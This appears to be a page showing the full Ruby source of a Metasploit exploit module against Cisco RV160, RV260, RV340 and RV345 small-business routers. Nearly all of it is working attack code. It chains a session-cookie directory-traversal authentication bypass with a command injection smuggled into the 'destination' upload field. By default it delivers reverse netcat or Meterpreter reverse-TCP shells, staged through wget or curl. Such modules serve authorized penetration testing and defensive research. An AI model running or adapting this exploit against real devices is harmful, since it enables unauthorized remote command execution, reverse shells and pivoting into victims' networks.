Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  prepend Msf::Exploit::Remote::AutoCheck
10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Exploit::CmdStager
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',
19
        'Description' => %q{
20
          This module exploits two vulnerabilities, a session ID directory traversal authentication
21
          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,
22
          and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.
23
          This access can then be used to pivot to other parts of the network. This module works on firmware
24
          versions 1.0.03.24 and below.
25
        },
26
        'License' => MSF_LICENSE,
27
        'Platform' => ['linux', 'unix'],
28
        'Author' => [
29
          'Biem Pham',  # Vulnerability Discoveries
30
          'Neterum',    # Metasploit Module
31
          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb
32
        ],
33
        'DisclosureDate' => '2021-11-02',
34
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
35
        'References' => [
36
          ['CVE', '2022-20705'], # Authentication Bypass
37
          ['CVE', '2022-20707'], # Command Injection
38
          ['ZDI', '22-410'], # Authentication Bypass
39
          ['ZDI', '22-411']  # Command Injection
40
        ],
41
        'Targets' => [
42
          [
43
            'Unix Command',
44
            {
45
              'Platform' => 'unix',
46
              'Arch' => ARCH_CMD,
47
              'Type' => :unix_cmd,
48
              'Payload' => {
49
                'BadChars' => '\'#'
50
              },
51
              'DefaultOptions' => {
52
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
53
              }
54
            }
55
          ],
56
          [
57
            'Linux Dropper',
58
            {
59
              'Platform' => 'linux',
60
              'Arch' => [ARCH_ARMLE],
61
              'Type' => :linux_dropper,
62
              'Payload' => {
63
                'BadChars' => '\'#'
64
              },
65
              'CmdStagerFlavor' => [ 'wget', 'curl' ],
66
              'DefaultOptions' => {
67
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
68
              }
69
            }
70
          ]
71
        ],
72
        'DefaultTarget' => 0,
73
        'DefaultOptions' => {
74
          'RPORT' => 443,
75
          'SSL' => true,
76
          'MeterpreterTryToFork' => true
77
        },
78
        'Notes' => {
79
          'Stability' => [CRASH_SAFE],
80
          'Reliability' => [REPEATABLE_SESSION],
81
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
82
        }
83
      )
84
    )
85
    register_options(
86
      [
87
        OptString.new('TARGETURI', [true, 'Base path', '/'])
88
      ]
89
    )
90
  end
91

92
  # sessionid utilized later needs to be set to length
93
  # of 16 or exploit will fail. Tested with lengths
94
  # 14-17
95
  def generate_session_id
96
    return Rex::Text.rand_text_alphanumeric(16)
97
  end
98

99
  def check
100
    res = send_request_cgi({
101
      'method' => 'GET',
102
      'uri' => '/upload',
103
      'headers' => {
104
        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
105
      }
106
    }, 10)
107

108
    # A proper "upload" will trigger file creation. So the send_request_cgi call
109
    # above is an incorrect "upload" call to avoid creating a file on disk. The router will return
110
    # status code 405 Not Allowed if authentication has been bypassed by the above request.
111
    # The firmware containing this authentication bypass also contains the command injection
112
    # vulnerability that will be abused during actual exploitation. Non-vulnerable
113
    # firmware versions will respond with 403 Forbidden.
114
    if res.nil?
115
      return CheckCode::Unknown('The device did not respond to request packet.')
116
    elsif res.code == 405
117
      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
118
    elsif res.code == 403
119
      return CheckCode::Safe('The device is not vulnerable to exploitation.')
120
    else # Catch-all
121
      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
122
    end
123
  end
124

125
  def execute_command(cmd, _opts = {})
126
    res = send_exploit(cmd)
127

128
    # Successful unix_cmd shells should not produce a response.
129
    # However if a response is returned, check the status code and return
130
    # Failure::NotVulnerable if it is 403 Forbidden.
131
    if target['Type'] == :unix_cmd && res&.code == 403
132
      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
133
    end
134

135
    if target['Type'] == :linux_dropper
136
      fail_with(Failure::Unreachable, 'The target did not respond') unless res
137
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
138
      begin
139
        body_json = res.get_json_document
140
        fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
141
      rescue JSON::ParserError => e
142
        print_error("Failed: #{e.class} - #{e.message}")
143
        fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')
144
      end
145
    end
146

147
    print_good('Exploit successfully executed.')
148
  end
149

150
  def send_exploit(cmd)
151
    filename = Rex::Text.rand_text_alphanumeric(5..12)
152
    fileparam = Rex::Text.rand_text_alphanumeric(5..12)
153
    input = Rex::Text.rand_text_alphanumeric(5..12)
154

155
    # sessionid utilized later needs to be set to length
156
    # of 16 or exploit will fail. Tested with lengths
157
    # 14-17
158
    sessionid = Rex::Text.rand_text_alphanumeric(16)
159

160
    filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.
161
    pathparam = 'Configuration'
162

163
    destination = "'; " + cmd + ' #'
164

165
    multipart_form = Rex::MIME::Message.new
166
    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
167
    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
168
    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
169
    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
170
    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
171
    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))
172

173
    # Escaping "/tmp/upload/" folder that does not contain any other permanent files
174
    send_request_cgi({
175
      'method' => 'POST',
176
      'uri' => '/upload',
177
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
178
      'headers' => {
179
        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
180
      },
181
      'data' => multipart_form.to_s
182
    }, 10)
183
  end
184

185
  def exploit
186
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
187
    case target['Type']
188
    when :unix_cmd
189
      execute_command(payload.encoded)
190
    when :linux_dropper
191
      execute_cmdstager(linemax: 120)
192
    end
193
  end
194
end
195

196